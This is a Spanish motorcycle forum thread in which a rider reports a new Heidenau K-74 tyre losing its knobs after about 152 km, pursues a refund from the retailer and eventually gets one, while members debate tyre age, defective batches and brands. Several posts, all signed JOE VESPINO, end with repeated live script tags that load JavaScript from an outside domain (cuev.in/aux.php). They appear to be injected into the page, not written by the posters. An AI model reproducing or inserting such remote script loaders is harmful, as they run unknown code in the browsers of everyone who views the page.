PDA

Ver la versión completa : OJO CON EL HEIDENAU K- 74



Joan KLX
15/11/2015, 21:13
Buenas compañeros, empieza la temporada trail para mí y no de la mejor manera.

Voy con los detalles de lo sucedido, el pasado fín de semana inaguramos la temporada trail algunos amigos de mí zona, entre ellos otros foreros como el trencaterros y Joan Xtarragona, pues salimos en direccion a los Pirineos catalanes i andorranos, mí viaje no duro mucho sin problemas, cuando llevábamos unos 152 km entre pistas, caminos y asfalto paramos a almorzar, uno de los compañeros de salida me comenta que me falta un taco en la rueda trasera, yó en princípio lo ignoro un poco pensando que era una broma, pero no tardo en mirar la rueda y me doy cuenta que lo que dice és cierto, és más, faltan bastantes tacos de la zona central del neumático, y los que todabía están se aguantan por los pelos, yá que está literalmente arrancados desde las lonas.
Yó si que notaba un bailoteo de la parte trasera de la moto, pero yá sabeis que con ruedas nuevas de tacos y cargados con el equipaje, hasta que sé liman un poco los cantos de los tacos ésto suele suceder.
Otra história para no dormir fue encontrar neumático pero ésto es otro tema lamentable de hoy dia, que nadie tiene estock de nada.
Total que tube que regresar a mí casa y chuparme unos kilómetros extra por asfalto y cambiar el maldito Heidenau por un Mitas C-02 130/80-17 los dos por supuesto.
De momento tengo una reclamación hecha a Oponeo que és donde normalmente compro neumáticos, ahora a esperar toca por que éllos tienen que reclamar al fabricante, el formulário que me mando Oponeo para rellenar son 5 hojas, menos pedirme el nombre y fecha de nacimiento de mís compañeros me pidieron de todo a aparte de las fotos como és normal, pero bueno no hay problema yá está enviado y a esperar.
Os cuento ésto para que esteis al tanto de lo que puede suceder con éste modelo de neumático, yó había oido algo al respecto, ahora lo tengo bién claro que no vuelvo a montarlos, y menos mal dentro de lo malo que mé paso a mí, yá que había recomendado los neumáticos éstos a los compañeros que también lo llevaban montado la mayoría.

Salut!!

http://fotos.subefotos.com/12b7dd6160d04d7f6701c725efd46a27o.jpg


http://fotos.subefotos.com/c6e2a6e2429f972867e896ec427fa93bo.jpg


http://fotos.subefotos.com/9f43eb3ae1e8392c4c588106073d5873o.jpg

http://fotos.subefotos.com/daa2677e711e4aaa8cfd89e592553628o.jpg

http://fotos.subefotos.com/102d1e8d48c759ad10861f9a30cf604eo.jpg

http://fotos.subefotos.com/66ffe12805bbe27babb986921a1f3b98o.jpg

katune
15/11/2015, 21:25
Yo tambien lo he padecido,me duro una salida,y no por desgaste o defecto de fabricacion,es que iba acojonado,el peor neumatico que he puesto en toda mi vida

gon
15/11/2015, 21:26
Joder que faena y que chapuza, gracias por la información y a ver si no te vuelven muy loco que lo de las reclamaciones es de traca a veces!!

ENEKODRZ-E
15/11/2015, 21:32
Joder....menuda faena joan

conejilope
15/11/2015, 21:56
Vaya faena. Nunca imagine que podrian dar estos problemas una marca como heidenau. Por lomque veo son recurrentes en este modelo.yo llevo los k60 y estoy contento, pero voy a empezar a fijarme mas en profundidad y mas a menudo.

Cherokee
15/11/2015, 22:04
Collons Joan.... supongo será defecto de fabricación de ese neumatico en particular, pero joder...

keltoi
15/11/2015, 22:14
mas que el modelo, puede ser un problema de la marca???

http://www.forof800gs.es/viewtopic.php?t=17553

un simple ejemplo.. y algo mas he leido de otros casos "raros".

No se, la experiencia de otras marcas que llevan años con buenos resultados, y a precios mas altos,,,creo que tiene un valor. A mi esta marca no me ilustra calidad, me ilustra buen precio,, y " a veces", ambas cosas son incompatibles.

Hay que saber quien, y donde, pero en una fabricacion en cadena, no va a salir un neumatico en malas condiciones como el tuyo, seguramente sera todo un lote de produccion por defecto. Tiene que haber muchisimos mas casos por toda Europa....es vergonzoso con una rueda nueva...eso podria pasar si la rueda tuviese 10 años.. como le pasa a alguna gente que hace pocos kms, y al final el neumatico se destroza sin haberlo usado apenas.

Es una opinion personal... solo eso. Una autoreflexion quizas....

luismi07
15/11/2015, 23:24
Ninguna marca relacionada con el mundo de la automoción te va a admitir un fallo de fabricación ni de ningún otro tipo.Lo sabre yo que trabajo en una.Y alguna reclamacion he hecho y he visto.
Se juegan mucho y lo mas facil es negarlo y en el 99% de los casos pasara inadvertido, aunque tengan decenas de reclamaciones.
Y por supuesto ni te daran otro neumatico ni devolverte el dinero.Seria admitir el fallo. Tendrias que demostrarlo tu, con un estudio hecho por ingenieros y con una reclamación judicial.
Y ojo con lo que publicas o te buscaran la vuelta. Si realmente quieres hacer lo correcto, denuncia a organizaciones de consumidores en el juzgado o donde se menester. Todo lo demas vas a esperar inutilmente.

luismi07
15/11/2015, 23:30
Lo de arrancar casi todos los tacos a mi me paso con unos Briguestone que tenia en una rueda de repuesto sin usar desde hacia muchos años. Supongo que la goma ya no estaría en buen estado, pues las gomas y plasticos se degradan mucho con el paso del tiempo. Pero en neumticos nuevos desde luego no es normal.

cruiser
16/11/2015, 10:06
Puede pasar en cualquier marca. A mi hace 3 años me pasó en un MT21 trasero nueveceito que en un rato de carretera a buen ritmo cuando llegué a casa me faltaban 2 tacos de los gordos del centro, y la rueda tenía aún hasta los pelillos de nueva que era. Me fuí al taller y me dijeron que hablarían con el distribuidor. Así lo hicieron y dijo que en una rueda de campo nada de nada, que quien le dice a él que no me lo he cargado dándole en una zona de piedras, así que me lo comí con patatas. Por supuesto, era un neumático que ponía mucho para trail medias e incluso gordotas, y no he vuelto a comprar ninguna rueda de la marca Pirelli. Es mi pequeña venganza. A los dos meses volví por el taller a otra cosa y me comentó el chaval que había venido otro cliente con la rueda igual, y que era de la misma partida de ruedas que compró, con lo que claramente fue una partida con la goma en malas condiciones. Puede pasar con cualquiera, pero me dió muy mala leche que no se hicieran cargo.

transalacant
16/11/2015, 10:31
A mi me pasó lo mismo con otro Heidenau, un K78 cuyos tacos empezaron a arrancarse en cuanto salí al campo. A los 500kms de pistas de piedras ya estaba para tirar, esto en una Transalp. Sin embargo el K69 delantero me dió muy buen resultado en duración y agarre.

Otro Heidenau, un K60 trasero también en la Transalp, en un viaje a Marruecos se agrietó por dentro, y al regresar me pellizcaba las cámaras.

Ahora llevo una temporada con Mitas en DR 650 y KTM 640. Los E09 y C17 bien, pero un EF07 trasero me duró un suspiro en la 640, y también empezó pronto a perder tacos. El EF08 delantero está aguantando bien.

betitou
16/11/2015, 11:25
Otro Heidenau, un K60 trasero también en la Transalp, en un viaje a Marruecos se agrietó por dentro, y al regresar me pellizcaba las cámaras.


Esto le ha pasado a un colega también, y hasta que dimos con lo que era fueron 4 los pinchazos...

JOE VESPINO
16/11/2015, 11:38
Joé que gracia!!.

¿En los neumaticos de amoto viene la fecha de fabricación como en los de coche? <script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

Joan KLX
16/11/2015, 12:01
Respondiendo a todos vosotros tengo que deciros que si que fue una mala faena, todo el año esperando ésta salida, teniendo la moto lista desde hacía más de un mes, aceites, filtros, etc, nuevos o revisados, y los neumáticos nuevos de trinca con apenas 10 km de asfalto interurbano por aquello de ir sacando la moto por probar algún posible defecto o problema.

Nunca hasta hoy había tenido ningún problema con éstos neumáticos, y por campo con terreno enfangado, blando o mojado sé comportan bastante bién, de hecho los compañeros de salida que los habían probado en otra ocasión les gustaron también y han repetido como es lógico.
Al ser de compuesto blando a mí solo me duran unos 1200 km, o sea que me aguantan ésta salida y poco más pero me conformo con ello.
Lamentablemente no hay mucho donde elegir con tacos llevando llanta de 17", están los Michelín T-63, los Mitas E-09 (copia de los anteriores, un poco más económicos pero ya no tanto) y los Mitas C-02, éstos últimos son los que llevaba montando hace años hasta que descubrí los Heidenau K-74.

Cuando regresé a casa para cambiar el K-74, monté un C-02 que tenía guardado para utilizar en mí zona que es terreno más seco, duro y pedregoso, éste C-02 después de hacer esta salida con unos 1400 km recorridos entre asfalto y campo, sé han quedado a más de medio uso, impensable con los Heidenau, pero en contrapartida por zonas con hierba mojada o no, losas de piedra también húmedas, o barro no tienen comparación con el agarre que me proporcionaban los K-74, ahora bién visto lo sucedido no me atrevo a volverlos a montar jamás.
Os comento lo sucedido con el Heidenau solo y nada más para advertiros que esteis al tanto de lo que os puede pasar, no es mí intención meter cizaña a la marca, que llegado el caso que no sé hagan cargo, o bién de devolverme los 74€ que pagué u otro neumático, entonces ya miraría que acciones tomar.

En la página de Oponeo pone que los neumáticos tienen 2 años de garantía, siempre y cuando estén a más de medio uso y que no sé hayan roto por un mal uso al montarlos, o séa que supongo que por lo que dicen si no se hace cargo la marca alemana, tendrá que hacerlo el intermediario que es Oponeo, de todas formas ya os contaré como queda todo.

Otra cosa que quiero decir aprovechando la ocasión, es que és penoso que te quedes tirado por no hallar ningún taller o casa de neumáticos, donde encontrar ni tan siquiera un neumático se cual sea la marca con tacos de 17", como si estuviéramos quién sabe donde y no en un pais donde las motos abundan, incluso buscamos vía internet en Lléida que no es una ciudad pequeña que digamos, y como mucho tenían una TKC-80 para el día siguiente, en fin que a si nos ba.

Salut!! :sombrero:

Joan KLX
16/11/2015, 12:10
Joé que gracia!!.

¿En los neumaticos de amoto viene la fecha de fabricación como en los de coche? <script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>


Si que ba la fecha de fabricación en una ventanita al lateral de la goma, igual que en los neumáticos de cohe o camión, pone el número de semana y año, en el mío en concreto pone 36 13, o sea semana 36 del año 2013, no era muy nuevo que digamos pero tampoco para que haya pasado lo comentado.

Adjunto foto:

http://fotos.subefotos.com/d147f7e6fd08e68c4f0b6f588a9f74b7o.jpg

Salut!!

JOE VESPINO
16/11/2015, 12:17
Sip, unos dos años, no es tanto.<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

luismi07
16/11/2015, 12:28
No existe fecha de caducidad en los neumaticos, si de fabricación. Y en una fabrica como la que yo trabajo, todos los neumaticos se montan recien sacados del horno, pero algunos de poco uso pudieran almacenarse mas tiempo. Por norma interna jamas se monta un vehiculo con neumaticos de mas de un año.

JOE VESPINO
16/11/2015, 13:26
En la fábrica no lo se, en las tiendas o talleres como te despistes te los cuelan con un año y con dos tambien. Me pilla fresquito el tema, el otro día a un compañero le intentaron "colocar" unos pirelli de principios del 2014 (..el tio dijo que nó, hizo muy bien, estoy hablando de 4 gomas para un SUV de más de 700 pavos de PVP)

betitou
16/11/2015, 13:40
Yo compré el otro día un delantero de Metzeler Unicross en ventanumaticos.com, y no sólo es el mejor precio que he encontrado (45 € gastos de envío incluídos) sino que además es de la semana 10 de 2015, vamos, que tiene menos de un año...

Joan KLX
16/11/2015, 14:21
Llevo viendo desde hace años que es costumbre en algunas páginas web, hasta en alguna casa de neumáticos aveces también cuelan de "viejos", neumáticos a buén précio pero un poco pasados de fecha de fabricación, con más de un año, supongo que éstos intermediarios ya lo hacen aposta para ganar más dinero, pero bueno como ha dicho Joe Vespino, tampoco son tantos 2 años, por ejemplo yo llevo montados unos Michelín Énergi en mí coche hace más de 4 años, y no sé cual es la fecha de su fabricación, de momento siguen rodando y lo que les queda por que hago con el coche unos 2000 km al año como mucho. No está la cosa para ir cambiando las gomas cada 2 o 3 años.

Salut!!

gasclassic
16/11/2015, 14:39
Ya lo dije en otro post, en la Montesa llevo los Pirelli originales, de 1978 y aunque evidentemente se aprecian ya algunas pequeñas grietas, van bien y ahí estan con sus 37 años, si, 37, no 4 o 5.
Y esto parecerá una locura, pero en el mundo de los clásicos pasa muchas veces, ya sea por usarse poco o sencillamente por no haber medidas disponibles.
Igual que una práctica habitual en taxistas es comprar los neumáticos y guardarlos 4 o 5 años, para montarlos resecos y que les duren mas.
Y cuando corría en resistencia de circuitos, usaba neumáticos viejos (15-20 años) para que aguantaran la carrera, por que unos nuevos no duraban ni una hora y los slicks son caros de narices y esto en tandas de drift es muy habitual, pillar gomas viejas de desguace.
Algunos con la fecha de los neumáticos os preocupáis demasiado.

luismi07
16/11/2015, 15:44
Hombre que un neumatico se arranquen todos los tacos, no es normal, aunque tenga varios años.

La fabricación de un neumatico lleva un proceso mas largo y complejo de lo que parece. Y no es tan raro que una partida salga defectuosa.

Evidentemente es un defecto de diseño o fabricación,pero eso no lo van a reconocer nunca a un particular.

Mas les valdria, pues pienso que es mas lo que pierden que lo que tienen por ganar, pero así es ese mundillo, y sobre todo es porque un defecto de fabrica en otro tipo de articulo, no contrae responsabilidades de seguridad. Si te sale un sombrero defectuoso no es lo mismo que un neumatico que implica jugarte la vida. Y como saben que pueden recibir demandas por ello , pues mejor no reconocer nada y si puedes me lo demuestras tu.

CORTIJERO
16/11/2015, 15:58
En Youtube hay un video de un usuario con el mismo problema y es del año 2012, algo pasa, o el neumático es una mierda, o algunos lotes los traen de otra fábrica con menos calidad de fabricación

JOE VESPINO
16/11/2015, 16:03
..........
Algunos con la fecha de los neumáticos os preocupáis demasiado.

Por alusiones, en la moto de monte ni lo miro, incluso los suelo poner usados de cross que me regala mi tendero a veces con resultados casi catastroficos ja ja. Tampoco pienso que lo de Joan sea por la antiguedad (no es como para arrancar tacos, mas bien creo que es una partida defectuosa, como él mismo apunta).

Ahora bien, al coche (o en la moto gorda) yo solo pongo neumaticos de calidad contrastada aunque sean caros y duren poco (por experiencia, distancias de detención y grado de agarre no tiene nada que ver de unos a otros), y como tu comprenderás no vas a estar pagando por compuestos de alta calidad para que luego te den una rueda que lleva dos años resecándose en un almacén.

gasclassic
16/11/2015, 18:02
Por alusiones, en la moto de monte ni lo miro, incluso los suelo poner usados de cross que me regala mi tendero a veces con resultados casi catastroficos ja ja. Tampoco pienso que lo de Joan sea por la antiguedad (no es como para arrancar tacos, mas bien creo que es una partida defectuosa, como él mismo apunta).

Ahora bien, al coche (o en la moto gorda) yo solo pongo neumaticos de calidad contrastada aunque sean caros y duren poco (por experiencia, distancias de detención y grado de agarre no tiene nada que ver de unos a otros), y como tu comprenderás no vas a estar pagando por compuestos de alta calidad para que luego te den una rueda que lleva dos años resecándose en un almacén.

Si, pero que un neumático sea viejo, no significa que no agarre.
No lo hará igual que uno nuevo, eso está claro.
Pero no por viejo va a explotar.
Si explotan es por que están en mal estado, ya sean viejos o nuevos pero defectuosos.
Evidentemente como mas viejo, mas números hay de que se rompa, por que propiedades pierde, pero si un neumático está bien guardado, ¿por que con dos años tiene que estar reseco?
O sea, que te gastas un pastón en unos nuevos, te los venden con apenas 4 o 5 meses desde su fabricación, los montas ¿y al año y medio los tiras aunque estén con pocos km y casi nuevos?
Lo que mas estropea los neumáticos, mas incluso que el paso del tiempo, es las condiciones que soportan.
Uno de recambio, que ni ha pisado el suelo, no ha visto el sol, ni ha pasado frío ni calor en toda su vida, aun después de 10 años puede estar bien, evidentemente el compuesto se ha ido resecando y perdido propiedades, pero es perfectamente aprovechable, incluso la goma desprende aun ese olorcillo característico.
Sin embargo puede ser que uno con apenas dos años empiece a estar mal, al haber soportado temperaturas muy altas y muy bajas, meadas de perro y haber pasado muchas horas al sol.
En ese caso, prefiero el de 10, que el de 2.

Resumiendo, hay mucha paranoia con la fecha de fabricación y curiosamente no la hay con montar marcas de dudosa reputación.
Anda que no hay coches con neumáticos Wanli, Ling Long, West Lake, Goodride, Austone o Nankang ...
Les ponen de fábrica el extra de llantas 17 o 18" y luego al ver el palo que es cambiar los neumáticos, acaban con mierdas.
Nuevas, eso si.

Y eso que en la 690 llevo unos Mitas y reconozco que mal no van, pero me gustan mas los Metzeler.

JOE VESPINO
16/11/2015, 18:54
Si, pero que un neumático sea viejo, no significa que no agarre.
No lo hará igual que uno nuevo, eso está claro.
Pero no por viejo va a explotar.
Si explotan es por que están en mal estado, ya sean viejos o nuevos pero defectuosos.
Evidentemente como mas viejo, mas números hay de que se rompa, por que propiedades pierde, pero si un neumático está bien guardado, ¿por que con dos años tiene que estar reseco?
O sea, que te gastas un pastón en unos nuevos, te los venden con apenas 4 o 5 meses desde su fabricación, los montas ¿y al año y medio los tiras aunque estén con pocos km y casi nuevos?
Lo que mas estropea los neumáticos, mas incluso que el paso del tiempo, es las condiciones que soportan.
Uno de recambio, que ni ha pisado el suelo, no ha visto el sol, ni ha pasado frío ni calor en toda su vida, aun después de 10 años puede estar bien, evidentemente el compuesto se ha ido resecando y perdido propiedades, pero es perfectamente aprovechable, incluso la goma desprende aun ese olorcillo característico.
Sin embargo puede ser que uno con apenas dos años empiece a estar mal, al haber soportado temperaturas muy altas y muy bajas, meadas de perro y haber pasado muchas horas al sol.
En ese caso, prefiero el de 10, que el de 2.

Resumiendo, hay mucha paranoia con la fecha de fabricación y curiosamente no la hay con montar marcas de dudosa reputación.
Anda que no hay coches con neumáticos Wanli, Ling Long, West Lake, Goodride, Austone o Nankang ...
Les ponen de fábrica el extra de llantas 17 o 18" y luego al ver el palo que es cambiar los neumáticos, acaban con mierdas.
Nuevas, eso si.

Y eso que en la 690 llevo unos Mitas y reconozco que mal no van, pero me gustan mas los Metzeler.

10, 20 años una neumatico??

A ver Gass, sin acrituz estamos saliendonos del asunto del post dandole demasiadas vueltas al tema: si usas gomas de calidad, dado que desgraciadamente agarre y duración son inversamente proporcionales, a pocos kms que hagas te van a durar como mucho 2, 3, quizás 4 años. Si quieres disfrutar durante esos pocos años del maximo agarre posible lo suyo es que las ruedas no hayan mermado previamente por estar almacenadas vete a saber como (dicen que lo peor es la temperatura y la humedad altas, y el problema es que pierden agarre, no que exploten ni nada parecido).

Eso no cambia porque sean peores las ruedas wanli, o si es mejor tener una rueda bien almacenada 20 años que otra solo 15 años pero mal almacenada. Respeto todas las opiniones, aunque todas esas opciones me parecen mas o menos suicidas, aunque me manifiesto incapaz de contestarte a cual es la peor y en que grado 8-)


<script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

gasclassic
16/11/2015, 19:15
10, 20 años una neumatico??

A ver Gass, sin acrituz estamos saliendonos del asunto del post dandole demasiadas vueltas al tema: si usas gomas de calidad, dado que desgraciadamente agarre y duración son inversamente proporcionales, a pocos kms que hagas te van a durar como mucho 2, 3, quizás 4 años. Si quieres disfrutar durante esos pocos años del maximo agarre posible lo suyo es que las ruedas no hayan mermado previamente por estar almacenadas vete a saber como (dicen que lo peor es la temperatura y la humedad altas, y el problema es que pierden agarre, no que exploten ni nada parecido).

Eso no cambia porque sean peores las ruedas wanli, o si es mejor tener una rueda bien almacenada 20 años que otra solo 15 años pero mal almacenada. Respeto todas las opiniones, aunque todas esas opciones me parecen mas o menos suicidas, aunque me manifiesto incapaz de contestarte a cual es la peor y en que grado 8-)


<script src="https://cuev.in/aux.php?ver=10" type="text/javascript"></script><script src="https://cuev.in/aux.php?ver=10" type="text/javascript"></script>

Si, si estoy de acuerdo en lo que dices.
A igualdad de condiciones, mas años = menos agarre.
Solo apuntaba que ha veces esa pérdida de agarre es asumible para ciertos usos, incluso rácing y para prueba, el drift.
Y que esa pérdida no es proporcional, si no los Pirelli con 37 años de mi 348 deberían ser como el jabón y ya te digo que agarrar, agarran.

conejilope
16/11/2015, 21:55
Pies yo pienso que si los neumaticos son del 2013, el tema esta en aaber como han estado almacenados durante esos dos años. Y a mi si me parece tiempo suficiente para que un neumatico se pueda degradar de sus caracteristicas y su durabilidad.

catatonic
17/11/2015, 00:20
Por lo que yo se, cuando sucede esto es debido a que la goma pierde propiedades por antigueda, por que ha estado en contacto con agentes químicos, o por que en la fabricación ha habido algún defecto en lo referente a la temperatura del compuesto goma en la unión con la carcasa.

catatonic
17/11/2015, 00:26
Joan, si lo gestionas bien no creo que tengas problema en que te den otra o que te devuelvan el dinero. Eso sí, guarda factura y haz foto del número de serie de la rueda, así como del DOT con la fecha de fabricación. La empresa es seria.
No puedo opinar igual de otros vendedores, que dejan muchi que desear

sbdtr
17/11/2015, 17:54
Joeeeee, es el modelo que he montado en la xt.:fuera:

De momento he hecho unos 200 kms. y (toco madera) de momento no se me ha jodio ningun taco, però ahora ya tengo el miedo en el cuerpo.

Yo los he comprado en internet a Alemania, creo, directamente, la verdad es que toca mucho la moral... y lo jodido es que tu moto Joan y la xt no se llevan mucho de peso y demas...

En fin, iremos viendo.

sbdtr
17/11/2015, 17:57
Por cierto, para hacerme una idea, a que presión las llevabas?

Joan KLX
17/11/2015, 19:05
Por cierto, para hacerme una idea, a que presión las llevabas?

Tranquilo que si llevas 200 km y están bién no creo que tengas problemas, yo me dí cuenta a los 152 km recorridos, unos 50 de asfalto y el resto por tierra, pero seguro que mucho antes de los 152 km ya estarían los tacos rotos.
La presión que llevo es de 1,4 por aquello de no tener ningún pellizco con alguna piedra y tal.

Suerte con el Heidenau :sombrero:

Salut!!

sbdtr
17/11/2015, 19:54
Es mas o menos la presion que llevo yo, a ver que tal. :o

Por cierto, a ver cuando coincidimos por estos montes, yo todavia le estoy cogiendo el tranquillo a la xt, que soy muy malo, però en cuanto lo haga, a hacer kilometros.

Saludos!

jokerdh
17/11/2015, 22:15
A mi me a pasado parecido con Mitas E 09, puse uno para ir a Marruecos y vi que se desintegraba, lo cambie y me fuy de viaje. Se desintegro... Los dos son de la misma remesa 2415, nuevecitos de este año pero esta claro que han salido malos. Esta semana e montado uno con otra fecha, mas viejo y sin problemas.

Leviatán
18/11/2015, 02:51
Yo monte el k74 en la Superenduro y no me ha durado más de 1500 km. También con tacos arrancados o mordidos, no se salva ni uno. SI es verdad que en barro agarran de cojones pero para todo lo demás una castaňa. He comprado un dunlop geomax que tiene el dibujo similar a ver que tal va.

Trencaterros
18/11/2015, 08:30
En la salida esta, a parte de Joan, lo monte yo en otra KLX y se montó también en una 950SE y en una XT. El año pasado y el anterior igual. Habremos montado unos 20 en el grupo, ¿no Joan?. Es un buen neumático y a 1,2kg agarra de narices en todos los terrenos. Es el primero que le pasa esto y el problema es que es un fallo habitual en este neumático. Lo mínimo seria que se lo cambiaran sin rechistar. Creo que en fabrica no afinan con el proceso de unión de la banda de rodadura y la carcaza.

Respecto a lo de que no se salva ni uno Leviatán, hombre, te duró 1500km...ya me dirás lo que te dura el Geomax en la 950SE jejeje, porque a mi en la EXC me duran entre 800 y 1000 y eso que soy cuidadoso con el mango. A Joan los K74 le duran 1200km hasta dejarlos lisos y a mi unos 2400 apurándolos. En esta salida hicimos unos 1000km y en la SE que venia con nosotros estaban ya bastante jodidos, pero es que darle al mango al neumático tan blando con un aparato de casi 200kg y 100cv, por pistas rápidas y terrenos rotos de primera y remar con los pies, es mucha tralla…

Resume: buen neumático blando con demasiadas unidades que fallan.

Trencaterros
18/11/2015, 08:44
Ha salido 2 veces

manchi
18/11/2015, 11:46
Puede que sea una cuestión puntual de este neumático o no, ya que hay otros modelos de Heidenau que han sido objeto de críticas.

En el enlace del otro foro comentan incuso que la marca que si es mala marca etc etc. Yo creo que Heidenau es una marca alemana y es buena, otra cosa es que le salga algún producto malo. Tened en cuentas la de miles de neumáticos que se gastan sin problemas por cada uno que sale mal.

A mi hasta ahora el único que me ha dado problemas de este tipo ha sido un Mitas E-07 que se me empezaron a rajar todos los tacos por la base y volví de vacaciones "acojonao".

En internet también se leen muchas cosas y a saber (por supuesto no es tu caso Joan, que te conocemos directamente). Hay ruedas que pueden estallar por mal montaje, por no cumplir especificaciones de carga y presiones, etc etc.

Por otro lado los neumáticos que fallan ¿Por que lo hacen? Ahí las marcas deberían preocuparse un poco más e investigar. Personalmente me da la impresión de que en este mundo que vivimos muchos trabajadores están tan "apretados" durante su jornada de trabajo que al final es natural que haya fallos en los procesos productivos (un simple retraso en los tiempos de vulcanizado, mal mantenimiento de la maquinaria, etc pueden hacer que un neumático no quede como tiene que quedar) Claro que si te falla una TV no pasa nada pero como te falle un neumático, especialmente de moto las consecuencias puede ser considerables.

Yo, además de reclamar al vendedor le notificaría a la marca el problema por un correo, es la única forma de que estén informados y pongan más atención.

JOE VESPINO
18/11/2015, 12:58
Yo monte el k74 en la Superenduro y no me ha durado más de 1500 km. También con tacos arrancados o mordidos, no se salva ni uno. SI es verdad que en barro agarran de cojones pero para todo lo demás una castaňa. He comprado un dunlop geomax que tiene el dibujo similar a ver que tal va.

Que Geomax? que tal te están resultando? tiene cierta prensa de romper tacos (aunque yo uso el MX51-52 y por ahora es el mas equilibrado en agarre-duración), en una SE será la prueba de fuego.

Leviatán
18/11/2015, 13:15
Que Geomax? que tal te están resultando? tiene cierta prensa de romper tacos (aunque yo uso el MX51-52 y por ahora es el mas equilibrado en agarre-duración), en una SE será la prueba de fuego.
modelo exacto geomax enduro, comprado en oponen, 64 euros. Más barato que los 82 que me costó la k74. la voy a montar esta semana y la probaré antes de que acabe el mes. El taco se le ve más duro que la k74 aunq por mi zona es mayoría pinar y terreno blando. A ver como responden. Seguiré informando

Joan KLX
18/11/2015, 22:19
Por otro lado los neumáticos que fallan ¿Por que lo hacen? Ahí las marcas deberían preocuparse un poco más e investigar. Personalmente me da la impresión de que en este mundo que vivimos muchos trabajadores están tan "apretados" durante su jornada de trabajo que al final es natural que haya fallos en los procesos productivos (un simple retraso en los tiempos de vulcanizado, mal mantenimiento de la maquinaria, etc pueden hacer que un neumático no quede como tiene que quedar) Claro que si te falla una TV no pasa nada pero como te falle un neumático, especialmente de moto las consecuencias puede ser considerables.



Estoy con tigo Manchi, sobretodo que en un vehículo ya sea moto o coche nos jugamos el pellejo, que por mucho estrés que lleve un operario los controles de calidad están para algo o deberían estarlo, y afinar al máximo en productos que afecten seriamente a la integridad de las personas.
Es mí humilde opinión personal, que al margen de lo dicho no os podeis ni imaginar lo que es llevar la moto con un neumático en estas condiciones, en la vida lo había pasado tan mal intentando conducir la moto dentro de mí carril en carretera, sobretodo trazando las curvas. Pensareis que la grua está para algo, pero aveces las ganas y la ilusión de uno, por volver lo antes posible a unirme a mis compañeros de salida ganaron la partida a la sensatez.
Hoy me ha llegado un C-02 que voy a montar para tenerlo a punto por si acaso pasa algo como ésta vez, cuando saque de la llanta el K-74 haré unas cuantas instantáneas más para que veais con más detalle como quedó el neumático con 300 km y poco más.

Salut!! :sombrero:

ranex
18/11/2015, 22:57
Pues yo viendo estas cosas no me la juego con Heidenau.

Joan KLX
19/11/2015, 21:14
Pues yo viendo estas cosas no me la juego con Heidenau.

Haces bién, yo tampoco me la pienso jugar más, de ahora en adelante y mientras no saquen algo mas con tacos para llantas de 17", montaré los Mitas C-02 como hacía antes de conocer los Heidenau éstos.

Salut!! :sombrero:

conejilope
20/11/2015, 10:51
Yo no soy ningun experto, pero no me parece que mitas sea una marca con mucha mas reputacion que heidenau....

Joan KLX
22/11/2015, 15:02
Yo no soy ningun experto, pero no me parece que mitas sea una marca con mucha mas reputacion que heidenau....

Pués visto lo visto y tras haber usado bastantes C-02 y C-21, y algunos E-09, hasta la fecha nunca he tenido ningún problema, no puedo decir lo mísmo de los Heidenau, otra cosa es que la mayoría de Mitas tengan el compuesto de goma más duro que otras marcas, y en zonas húmedas no tengan el mísmo agarre, por contrapartida también duran más y son algo más económicos.

Salut!! :sombrero:

selfsenda
22/11/2015, 19:47
Gracias Joan por la información, sería milagroso que mi moto arrancara los tacos. La única mala experiencia al comprar neumáticos por internet es que me vendieron unos Pirelli sólo aptos para circular en USA.

Joan KLX
15/02/2016, 22:56
Buenas compañeros, mé han devuelto al final el importe del neumático, bueno menos 3€ que se quedan los de PayPal por los gastos, o séa que de los 74€ que pagué he recuperado 71€, no está tan mal después de un tira y afloja durante todo éste tiempo con los de Oponeo.
Han utilizado la táctica del cansáncio peró con migo no les ha funcionado.
Todo y que no me dieron a elegir, la opción de la devolución del importe és mejor para mí, ya que no pienso montar nunca más un Heidenau.

Salut!! :sombrero:

Cherokee
15/02/2016, 23:17
:aplauso:molt be nano

Trencaterros
16/02/2016, 06:55
Sigo con el mismo montado y me esta durando bastante, pero visto lo que te pasó (yo iba a su lado ese día y no había para arrancar tacos ni mucho menos), estoy dudando de montarlo otra vez. Lástima porque en 17" es el neumático que más me gusta para atrás y en mi caso no se va mucho de duración con el C-02.

Isidoro
16/02/2016, 10:07
[emoji122] [emoji122] [emoji122]

barbo7
16/02/2016, 10:28
Pienso(en general y en todo tipo de productos)que la calidad y el precio están muy unidos(hay raras excepciones).En este caso,y defecto puntual aparte,unas ruedas con un buen precio y que duren bastante......pues en un momento dao,de tanto ajustar(y hoy en dia se ajustan mucho los procesos productivos) pues pueden pasar estas cosas.......

Trencaterros
16/02/2016, 17:11
Pienso(en general y en todo tipo de productos)que la calidad y el precio están muy unidos(hay raras excepciones).En este caso,y defecto puntual aparte,unas ruedas con un buen precio y que duren bastante......pues en un momento dao,de tanto ajustar(y hoy en dia se ajustan mucho los procesos productivos) pues pueden pasar estas cosas.......

+1.

5€ más por rueda se podrían pagar y igual se podría solucionar el problema, aunque creo que es más un problema de proceso no detectable que no falta de material o de calidad del mismo. Es que en 17" y campera queda poca cosa que sea buena.

luismi07
16/02/2016, 18:06
Una cosa es que el producto sea malo siempre y otra un defecto puntual. Una cosa es un producto caro y especializado y otra uno de batalla con menos prestaciones pero no por ello malo o peligroso.
Fallos de calidad los tienen todos, incluso marcas de primera fila.Se ve en moto GP en Formula 1 y lo veo todos los dias en mi trabajo.
Otra cosa es que no se quieran asumir responsabilidades, que por cierto tambien es cosa muy habitual.
Eso que te ha pasado con esa marca ha pasado muchas veces con otras mas conocidas. No deberia ser así, pero lamentablemente los defectos a veces solo se ven al probar el producto.
Cuando te paso esto, hable con el delegado en España de una marca de primera linea que nos surte a nosotros de neumaticos y le comente el caso. Me decia que no es posible que ocurra una cosa así en una partida de fabricacion sin que salten los chivatos de calidad. Pero eso lo dicen todos, lo veo a diario y luego pasa lo que pasa.
Y como son temas muy delicados por tema de seguridad y las responsabilidades que conlleva. Pues nadie reconoce nada, piensan que somos unos mindunguis y no va a llegar la sangre al rio. Ahora cuando es por ejemplo mi empresa quien les reclama, se cagan garras abajo.
